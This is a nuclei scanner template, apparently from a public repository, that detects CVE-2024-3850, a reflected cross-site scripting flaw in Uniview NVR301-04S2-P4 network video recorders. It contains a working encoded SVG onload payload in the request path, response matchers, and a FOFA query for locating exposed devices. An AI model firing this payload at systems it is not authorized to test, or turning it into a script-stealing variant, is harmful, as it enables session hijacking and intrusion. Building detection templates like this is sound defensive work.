nuclei-templates/http/cves/2024/CVE-2024-3850.yaml

52 lines
1.8 KiB
YAML
Raw Normal View History

2024-08-26 17:35:54 +00:00
id: CVE-2024-3850
info:
name: Uniview NVR301-04S2-P4 - Cross-Site Scripting
2024-08-26 17:38:56 +00:00
author: Bleron Rrustemi,r3naissance
2024-08-26 17:35:54 +00:00
severity: medium
description: |
2024-08-26 17:38:56 +00:00
Uniview NVR301-04S2-P4 contains a reflected cross-site scripting vulnerability via the PATH of LAPI. CISA and Uniview state that this vulnerability needs to be authenticated. This is incorrect. Any PATH payload can cause XSS. A submission to Mitre has been sent to update the verbiage in the finding as well as the CVSS score.
2024-08-26 17:35:54 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
remediation: |
To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-3850
- https://global.uniview.com/About_Us/Security/Notice/202406/992932_140493_0.htm
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2024-3850
cwe-id: CWE-79
cpe: cpe:2.3:h:uniview:nvr301-04s2-p4:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: Uniview
product: NVR301-04S2-P4
fofa-query:
- title="NVR301-04-P4"
tags: cve,cve2024,xss,uniview,nvr
http:
- method: GET
path:
- "{{BaseURL}}/V1.0%3CsVg/onload=alert.bind%28%29%281%29%3E/Alarm/Exceptions/LinkageActions?="
matchers-condition: and
matchers:
- type: word
part: body
words:
- "/V1.0<sVg/onload=alert.bind()(1)>/Alarm/Exceptions/LinkageActions?="
condition: and
- type: word
part: header
words:
- NVRDVR
- type: status
status:
- 200